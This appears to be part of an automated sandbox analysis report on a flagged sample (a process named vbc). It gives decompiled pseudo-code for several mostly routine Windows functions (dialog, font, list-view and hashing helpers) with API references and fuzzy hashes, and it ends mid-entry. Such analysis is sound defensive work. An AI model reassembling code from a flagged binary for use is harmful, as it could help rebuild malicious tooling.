                                                                                                                                                                        • API String ID: 2255314230-2212045309
                                                                                                                                                                        • Opcode ID: 9ab75551773aed32ac14d672ca6fc6d16b8ba2b7fe8e99e73c669c0c868d9bd0
                                                                                                                                                                        • Instruction ID: e64120c2db1572d8afbfe90730df88552d052729858ffd3f9c459fe70d1883dc
                                                                                                                                                                        • Opcode Fuzzy Hash: 9ab75551773aed32ac14d672ca6fc6d16b8ba2b7fe8e99e73c669c0c868d9bd0
                                                                                                                                                                        • Instruction Fuzzy Hash: FE114F72808345BBD720EA52DC02EAB7BECEB84344F04493EBD94D1191E735DA1CDAA7
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040AECD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0040AECD(void* __ebx, void* __eflags) {
				char _v265;
				char _v526;
				char _v787;
				void _v1048;
				void _v3648;
				intOrPtr _v3652;
				char _v3660;
				void* _t30;

				_t30 = __ebx;
				_v3660 = 0x414040;
				memset( &_v3648, 0, 0x10);
				_v1048 = 0;
				_v787 = 0;
				_v526 = 0;
				_v265 = 0;
				_v3652 = 0x6c;
				memcpy( &_v1048,  *((intOrPtr*)(__ebx + 0x370)) + 0xb20, 0x105 << 2);
				_t12 =  &_v3660; // 0x414040
				if(E00401540(_t12,  *((intOrPtr*)(__ebx + 0x108))) != 0) {
					E0040AEB7(memcpy( *((intOrPtr*)(__ebx + 0x370)) + 0xb20,  &_v1048, 0x105 << 2));
				}
				SetFocus( *( *((intOrPtr*)(_t30 + 0x370)) + 0x184));
				_t18 =  &_v3660; // 0x414040
				return E004013E7(_t18);
			}











                                                                                                                                                                        0x0040aecd
                                                                                                                                                                        0x0040aee3
                                                                                                                                                                        0x0040aeed
                                                                                                                                                                        0x0040af01
                                                                                                                                                                        0x0040af08
                                                                                                                                                                        0x0040af0f
                                                                                                                                                                        0x0040af16
                                                                                                                                                                        0x0040af1d
                                                                                                                                                                        0x0040af38
                                                                                                                                                                        0x0040af3a
                                                                                                                                                                        0x0040af47
                                                                                                                                                                        0x0040af64
                                                                                                                                                                        0x0040af64
                                                                                                                                                                        0x0040af75
                                                                                                                                                                        0x0040af7b
                                                                                                                                                                        0x0040af89

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040AEED
                                                                                                                                                                        • SetFocus.USER32(?,?), ref: 0040AF75
                                                                                                                                                                          • Part of subcall function 0040AEB7: PostMessageA.USER32 ref: 0040AEC6
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FocusMessagePostmemset
                                                                                                                                                                        • String ID: @@A$l
                                                                                                                                                                        • API String ID: 3436799508-3245464651
                                                                                                                                                                        • Opcode ID: caeb76f4659ab955c907a99837df0e7903f88894a94faa412a12e2d9c7c3a8b3
                                                                                                                                                                        • Instruction ID: b134d5c547a061a2024b59ce6a2071751047cb74c3ab3f5c012b8dbc43773ba7
                                                                                                                                                                        • Opcode Fuzzy Hash: caeb76f4659ab955c907a99837df0e7903f88894a94faa412a12e2d9c7c3a8b3
                                                                                                                                                                        • Instruction Fuzzy Hash: E511A5719001588BDF21DB15CD457CB7BA9AF40308F0800F5A94C7B282C7B55A89CFA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004085AB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E004085AB(void** __esi, struct HWND__* _a4) {
				long _v12;
				signed int _v24;
				signed int _v28;
				short _v32;
				void* _v40;
				long _t17;
				short* _t23;
				int _t24;
				void** _t25;

				_t25 = __esi;
				_t24 = 0;
				if(_a4 != 0) {
					_t17 = memset( *__esi, 0, __esi[1] << 2);
					if(__esi[1] > 0) {
						do {
							_v28 = _v28 & 0x00000000;
							_v24 = _v24 & 0x00000000;
							_t23 =  *_t25 + _t24 * 4;
							_v40 = 0x22;
							_t17 = SendMessageA(_a4, 0x1019, _t24,  &_v40);
							if(_t17 != 0) {
								 *_t23 = _v32;
								_t17 = _v12;
								 *(_t23 + 2) = _t17;
							}
							_t24 = _t24 + 1;
						} while (_t24 < _t25[1]);
					}
				}
				return _t17;
			}












                                                                                                                                                                        0x004085ab
                                                                                                                                                                        0x004085b3
                                                                                                                                                                        0x004085b8
                                                                                                                                                                        0x004085c4
                                                                                                                                                                        0x004085cf
                                                                                                                                                                        0x004085d1
                                                                                                                                                                        0x004085d3
                                                                                                                                                                        0x004085d7
                                                                                                                                                                        0x004085db
                                                                                                                                                                        0x004085eb
                                                                                                                                                                        0x004085f2
                                                                                                                                                                        0x004085fa
                                                                                                                                                                        0x00408600
                                                                                                                                                                        0x00408603
                                                                                                                                                                        0x00408607
                                                                                                                                                                        0x00408607
                                                                                                                                                                        0x0040860b
                                                                                                                                                                        0x0040860c
                                                                                                                                                                        0x004085d1
                                                                                                                                                                        0x004085cf
                                                                                                                                                                        0x00408614

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 004085C4
                                                                                                                                                                        • SendMessageA.USER32(?,00001019,00000000,?), ref: 004085F2
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSendmemset
                                                                                                                                                                        • String ID: "$\LA
                                                                                                                                                                        • API String ID: 568519121-1791104459
                                                                                                                                                                        • Opcode ID: 26f90e38fa5412fa5d9144848af1d9542bec1eb57a3646f7dcddd4dc696a0724
                                                                                                                                                                        • Instruction ID: 63acc278c780c6314b896fe9ea96fe6fcbd724764764ef8c6808a121558323c0
                                                                                                                                                                        • Opcode Fuzzy Hash: 26f90e38fa5412fa5d9144848af1d9542bec1eb57a3646f7dcddd4dc696a0724
                                                                                                                                                                        • Instruction Fuzzy Hash: 6401D635900204AFDB20DF45CA81AABB7F8FF84749F11842EE891A7241E7359E95CB79
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00406647 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E00406647(intOrPtr __eax, char* __esi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;

				_v76 = __eax;
				_v68 = _a4;
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;
				_v80 = 0x4c;
				_v56 = 1;
				_v52 = __esi;
				_v48 = 0x104;
				_v28 = 0x81804;
				_v20 = 0x41403c;
				if(GetOpenFileNameA( &_v80) == 0) {
					return 0;
				} else {
					strcpy(__esi, _v52);
					return 1;
				}
			}















                                                                                                                                                                        0x0040664d
                                                                                                                                                                        0x00406653
                                                                                                                                                                        0x00406658
                                                                                                                                                                        0x0040665b
                                                                                                                                                                        0x0040665e
                                                                                                                                                                        0x00406664
                                                                                                                                                                        0x0040666b
                                                                                                                                                                        0x00406672
                                                                                                                                                                        0x00406679
                                                                                                                                                                        0x0040667c
                                                                                                                                                                        0x00406683
                                                                                                                                                                        0x0040668a
                                                                                                                                                                        0x00406699
                                                                                                                                                                        0x004066ae
                                                                                                                                                                        0x0040669b
                                                                                                                                                                        0x0040669f
                                                                                                                                                                        0x004066aa
                                                                                                                                                                        0x004066aa

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileNameOpenstrcpy
                                                                                                                                                                        • String ID: L$ini
                                                                                                                                                                        • API String ID: 812585365-4234614086
                                                                                                                                                                        • Opcode ID: 0e8797fdf618d39e3eb3ab1232a77db25cc5d7ab3626c4b171bcbec14203ab80
                                                                                                                                                                        • Instruction ID: 37832acc40b05216fd1420d9404962ea4abb69311e967ef4bad7b399ffdc39fa
                                                                                                                                                                        • Opcode Fuzzy Hash: 0e8797fdf618d39e3eb3ab1232a77db25cc5d7ab3626c4b171bcbec14203ab80
                                                                                                                                                                        • Instruction Fuzzy Hash: 9001BDB1D102189FCF50DFA9D9456CEBFF8BB08348F00812AE519E6240EBB885458F98
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E00401000(void* __esi, void* __eflags) {
				struct tagLOGFONTA _v64;
				int _t10;
				long _t11;

				E0040619B( &_v64, "MS Sans Serif", 0xa, 1);
				_t10 = CreateFontIndirectA( &_v64);
				 *(__esi + 0x20c) = _t10;
				_t11 = SendDlgItemMessageA( *(__esi + 4), 0x3ec, 0x30, _t10, 0);
				if( *0x418388 != 0) {
					return SendDlgItemMessageA( *(__esi + 4), 0x3ee, 0x30,  *(__esi + 0x20c), 0);
				}
				return _t11;
			}






                                                                                                                                                                        0x00401013
                                                                                                                                                                        0x0040101f
                                                                                                                                                                        0x00401038
                                                                                                                                                                        0x0040103e
                                                                                                                                                                        0x00401047
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040105b
                                                                                                                                                                        0x0040105f

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040619B: memset.MSVCRT ref: 004061A5
                                                                                                                                                                          • Part of subcall function 0040619B: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406273,Arial,0000000E,00000000), ref: 004061E5
                                                                                                                                                                        • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                                                        • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                                                        • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ItemMessageSend$CreateFontIndirectmemsetstrcpy
                                                                                                                                                                        • String ID: MS Sans Serif
                                                                                                                                                                        • API String ID: 4251605573-168460110
                                                                                                                                                                        • Opcode ID: 7584cd5e44123684fe29065303b056f6d65f03dbfdfa9ec3df9736e2aa6a92dd
                                                                                                                                                                        • Instruction ID: 87dec32cde48cbcf1a13d2850fc5ac8412a7d38377e852ebd334ba5dd6d4256f
                                                                                                                                                                        • Opcode Fuzzy Hash: 7584cd5e44123684fe29065303b056f6d65f03dbfdfa9ec3df9736e2aa6a92dd
                                                                                                                                                                        • Instruction Fuzzy Hash: 0DF0A771B4030877EB216BA0EC4BF8A7BACAB41F01F148535FA51B51E1D6F5B644CB48
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004062DB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                        			E004062DB(struct HWND__* _a4) {
				void _v259;
				char _v260;
				signed int _t10;

				_v260 = 0;
				memset( &_v259, 0, 0xff);
				GetClassNameA(_a4,  &_v260, 0xff);
				_t10 =  &_v260;
				_push("edit");
				_push(_t10);
				L00412072();
				asm("sbb eax, eax");
				return  ~_t10 + 1;
			}






                                                                                                                                                                        0x004062f4
                                                                                                                                                                        0x004062fb
                                                                                                                                                                        0x0040630e
                                                                                                                                                                        0x00406314
                                                                                                                                                                        0x0040631a
                                                                                                                                                                        0x0040631f
                                                                                                                                                                        0x00406320
                                                                                                                                                                        0x00406329
                                                                                                                                                                        0x0040632e

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 004062FB
                                                                                                                                                                        • GetClassNameA.USER32(?,00000000,000000FF), ref: 0040630E
                                                                                                                                                                        • _stricmp.MSVCRT(00000000,edit), ref: 00406320
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClassName_stricmpmemset
                                                                                                                                                                        • String ID: edit
                                                                                                                                                                        • API String ID: 3665161774-2167791130
                                                                                                                                                                        • Opcode ID: 6e637e9eddf622f627d70554f5007a36f01acadd3667ac6aea8fad4d2d9c4dd7
                                                                                                                                                                        • Instruction ID: f5117061f2ecbf32e0f2d844d8c4f3ebb38ffa703039f8d1d2413de036cb48d9
                                                                                                                                                                        • Opcode Fuzzy Hash: 6e637e9eddf622f627d70554f5007a36f01acadd3667ac6aea8fad4d2d9c4dd7
                                                                                                                                                                        • Instruction Fuzzy Hash: 6BE09B72C4412A7EDB21A664EC01FE63BAC9F19705F0001B6B945E1081E6A497C48AA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040F41D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0040F41D() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x418520 == 0) {
					_t1 = LoadLibraryA("shell32.dll");
					 *0x418520 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathA");
						 *0x41851c = _t2;
						return _t2;
					}
				}
				return _t1;
			}





                                                                                                                                                                        0x0040f424
                                                                                                                                                                        0x0040f42b
                                                                                                                                                                        0x0040f433
                                                                                                                                                                        0x0040f438
                                                                                                                                                                        0x0040f440
                                                                                                                                                                        0x0040f446
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040f446
                                                                                                                                                                        0x0040f438
                                                                                                                                                                        0x0040f44b

                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryA.KERNEL32(shell32.dll,0040BBB8,73B74DE0,?,00000000), ref: 0040F42B
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040F440
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                        • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                                                                                                        • API String ID: 2574300362-543337301
                                                                                                                                                                        • Opcode ID: ebee045d17af5392e55c599677de8e54218ff7482c30a47864962e580415edd2
                                                                                                                                                                        • Instruction ID: f6b0fe8b92f076911ecc5568a6e4330759afce426f86003319557fe493e3cfe8
                                                                                                                                                                        • Opcode Fuzzy Hash: ebee045d17af5392e55c599677de8e54218ff7482c30a47864962e580415edd2
                                                                                                                                                                        • Instruction Fuzzy Hash: 59D092B0642202ABD7208F21AC097827AAAE798706F01C53AA800E12A4FF7895448A5D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004104AE Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                                                        			E004104AE(intOrPtr* __esi, void* __eflags) {
				void* _t27;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t44;

				_t44 = __esi;
				 *__esi = 0x415314;
				_t27 = E00406578(0x46c, __esi);
				_push(0x20);
				L00412090();
				if(_t27 == 0) {
					_t28 = 0;
				} else {
					_t28 = E00406A5B(_t27);
				}
				_push(0x20);
				 *((intOrPtr*)(_t44 + 0x450)) = _t28;
				L00412090();
				if(_t28 == 0) {
					_t29 = 0;
				} else {
					_t29 = E00406A5B(_t28);
				}
				_push(0x14);
				 *((intOrPtr*)(_t44 + 0x454)) = _t29;
				L00412090();
				if(_t29 == 0) {
					_t29 = 0;
				} else {
					 *((intOrPtr*)(_t29 + 0xc)) = 0;
					 *_t29 = 0;
					 *((intOrPtr*)(_t29 + 4)) = 0;
					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t29 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t44 + 0x458)) = _t29;
				L00412090();
				if(_t29 == 0) {
					_t29 = 0;
				} else {
					 *((intOrPtr*)(_t29 + 0xc)) = 0;
					 *_t29 = 0;
					 *((intOrPtr*)(_t29 + 4)) = 0;
					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t29 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t44 + 0x45c)) = _t29;
				L00412090();
				if(_t29 == 0) {
					_t29 = 0;
				} else {
					 *((intOrPtr*)(_t29 + 0xc)) = 0;
					 *_t29 = 0;
					 *((intOrPtr*)(_t29 + 4)) = 0;
					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t29 + 8)) = 0;
				}
				 *((intOrPtr*)(_t44 + 0x460)) = _t29;
				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x450)) + 0x14)) = 0x2000;
				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x454)) + 0x14)) = 0x2000;
				 *((intOrPtr*)(_t44 + 0x3c)) = 1;
				 *((intOrPtr*)(_t44 + 0x40)) = 1;
				 *((intOrPtr*)(_t44 + 0x44)) = 1;
				 *((intOrPtr*)(_t44 + 0x48)) = 1;
				return _t44;
			}







                                                                                                                                                                        0x004104ae
                                                                                                                                                                        0x004104b6
                                                                                                                                                                        0x004104bc
                                                                                                                                                                        0x004104c1
                                                                                                                                                                        0x004104c3
                                                                                                                                                                        0x004104ce
                                                                                                                                                                        0x004104d7
                                                                                                                                                                        0x004104d0
                                                                                                                                                                        0x004104d0
                                                                                                                                                                        0x004104d0
                                                                                                                                                                        0x004104d9
                                                                                                                                                                        0x004104db
                                                                                                                                                                        0x004104e1
                                                                                                                                                                        0x004104e9
                                                                                                                                                                        0x004104f2
                                                                                                                                                                        0x004104eb
                                                                                                                                                                        0x004104eb
                                                                                                                                                                        0x004104eb
                                                                                                                                                                        0x004104f4
                                                                                                                                                                        0x004104f6
                                                                                                                                                                        0x004104fc
                                                                                                                                                                        0x00410509
                                                                                                                                                                        0x0041051b
                                                                                                                                                                        0x0041050b
                                                                                                                                                                        0x0041050b
                                                                                                                                                                        0x0041050e
                                                                                                                                                                        0x00410510
                                                                                                                                                                        0x00410513
                                                                                                                                                                        0x00410516
                                                                                                                                                                        0x00410516
                                                                                                                                                                        0x0041051d
                                                                                                                                                                        0x0041051f
                                                                                                                                                                        0x00410525
                                                                                                                                                                        0x0041052d
                                                                                                                                                                        0x0041053f
                                                                                                                                                                        0x0041052f
                                                                                                                                                                        0x0041052f
                                                                                                                                                                        0x00410532
                                                                                                                                                                        0x00410534
                                                                                                                                                                        0x00410537
                                                                                                                                                                        0x0041053a
                                                                                                                                                                        0x0041053a
                                                                                                                                                                        0x00410541
                                                                                                                                                                        0x00410543
                                                                                                                                                                        0x00410549
                                                                                                                                                                        0x00410551
                                                                                                                                                                        0x00410563
                                                                                                                                                                        0x00410553
                                                                                                                                                                        0x00410553
                                                                                                                                                                        0x00410556
                                                                                                                                                                        0x00410558
                                                                                                                                                                        0x0041055b
                                                                                                                                                                        0x0041055e
                                                                                                                                                                        0x0041055e
                                                                                                                                                                        0x0041056b
                                                                                                                                                                        0x00410576
                                                                                                                                                                        0x0041057f
                                                                                                                                                                        0x00410586
                                                                                                                                                                        0x00410589
                                                                                                                                                                        0x0041058c
                                                                                                                                                                        0x0041058f
                                                                                                                                                                        0x00410595

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??2@$memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1860491036-0
                                                                                                                                                                        • Opcode ID: 7bad43f24cb77abe56b588b58120f20ee9b42d559bc282368106ea24cb956e28
                                                                                                                                                                        • Instruction ID: e5f264b8724d3d475e9e13978f0762699e8b6218914c988ba7d238899ccfa6da
                                                                                                                                                                        • Opcode Fuzzy Hash: 7bad43f24cb77abe56b588b58120f20ee9b42d559bc282368106ea24cb956e28
                                                                                                                                                                        • Instruction Fuzzy Hash: 2431E8B0A007009FD750DF3A99856A6FBE5EF84305B25886FD25ACB262D7B8D481CF19
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004065B4 Relevance: 6.3, APIs: 5, Instructions: 53stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                        			E004065B4(char* __edi, intOrPtr _a4, signed int _a8) {
				void _v259;
				char _v260;
				char* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_t37 = _t36 + 0xc;
				 *__edi = 0;
				_t35 = 0;
				do {
					sprintf( &_v260, 0x413470,  *(_t35 + _a4) & 0x000000ff);
					_t37 = _t37 + 0xc;
					if(_t35 > 0) {
						strcat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							strcat(_t34, "  ");
						}
					}
					strcat(_t34,  &_v260);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}









                                                                                                                                                                        0x004065b4
                                                                                                                                                                        0x004065cc
                                                                                                                                                                        0x004065d3
                                                                                                                                                                        0x004065d8
                                                                                                                                                                        0x004065db
                                                                                                                                                                        0x004065de
                                                                                                                                                                        0x004065e0
                                                                                                                                                                        0x004065f4
                                                                                                                                                                        0x004065f9
                                                                                                                                                                        0x004065fe
                                                                                                                                                                        0x00406606
                                                                                                                                                                        0x0040660c
                                                                                                                                                                        0x00406611
                                                                                                                                                                        0x00406615
                                                                                                                                                                        0x0040661b
                                                                                                                                                                        0x00406623
                                                                                                                                                                        0x00406629
                                                                                                                                                                        0x0040661b
                                                                                                                                                                        0x00406632
                                                                                                                                                                        0x00406637
                                                                                                                                                                        0x0040663f
                                                                                                                                                                        0x00406646

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strcat$memsetsprintf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 582077193-0
                                                                                                                                                                        • Opcode ID: f97dc6c3a2e75b9a245aecc583dcd71bc50743b83a8a0946cd7d9d5c2e4ca989
                                                                                                                                                                        • Instruction ID: 9a6b28ef774d6e53ee32a9c0eecf57d77903bda120735f9d6ade06843e2f5b66
                                                                                                                                                                        • Opcode Fuzzy Hash: f97dc6c3a2e75b9a245aecc583dcd71bc50743b83a8a0946cd7d9d5c2e4ca989
                                                                                                                                                                        • Instruction Fuzzy Hash: 03014C32A042152AD73266569C02BEB3B9C9B58708F10817FF944E51C2EAFCD6D4879D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040BEEC Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0040BEEC(void* __edi, void* __esi, void* _a4) {
				signed int _t13;
				signed int _t25;
				int _t26;
				char* _t30;
				void* _t31;
				void* _t33;
				void* _t35;

				_t35 = __esi;
				_t25 = 0x3f;
				_t13 =  *(__esi + 0x10) >> 0x00000003 & _t25;
				_t30 = __esi + 0x18 + _t13;
				 *_t30 = 0x80;
				_t26 = _t25 - _t13;
				_t31 = _t30 + 1;
				if(_t26 >= 8) {
					memset(_t31, 0, _t26 + 0xfffffff8);
				} else {
					memset(_t31, 0, _t26);
					_t33 = __esi + 0x18;
					E0040BF6B(_t33, __esi);
					memset(_t33, 0, 0x38);
				}
				 *((intOrPtr*)(_t35 + 0x50)) =  *((intOrPtr*)(_t35 + 0x10));
				 *((intOrPtr*)(_t35 + 0x54)) =  *((intOrPtr*)(_t35 + 0x14));
				E0040BF6B(_t35 + 0x18, _t35);
				memcpy(_a4, _t35, 0x10);
				return memset(_t35, 0, 4);
			}










                                                                                                                                                                        0x0040beec
                                                                                                                                                                        0x0040bef4
                                                                                                                                                                        0x0040bef5
                                                                                                                                                                        0x0040bef7
                                                                                                                                                                        0x0040befb
                                                                                                                                                                        0x0040befe
                                                                                                                                                                        0x0040bf00
                                                                                                                                                                        0x0040bf04
                                                                                                                                                                        0x0040bf33
                                                                                                                                                                        0x0040bf06
                                                                                                                                                                        0x0040bf0b
                                                                                                                                                                        0x0040bf10
                                                                                                                                                                        0x0040bf17
                                                                                                                                                                        0x0040bf21
                                                                                                                                                                        0x0040bf29
                                                                                                                                                                        0x0040bf3e
                                                                                                                                                                        0x0040bf44
                                                                                                                                                                        0x0040bf4c
                                                                                                                                                                        0x0040bf58
                                                                                                                                                                        0x0040bf6a

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$memcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 368790112-0
                                                                                                                                                                        • Opcode ID: f09e4137cee235a1b9d7fd27eaadac0c52e283a178c2e8a252c289c30bf46ad1
                                                                                                                                                                        • Instruction ID: 1bd4811e219587db2c743c544c50c2778389369fcaa1acc1f1d0acac3f9f4604
                                                                                                                                                                        • Opcode Fuzzy Hash: f09e4137cee235a1b9d7fd27eaadac0c52e283a178c2e8a252c289c30bf46ad1
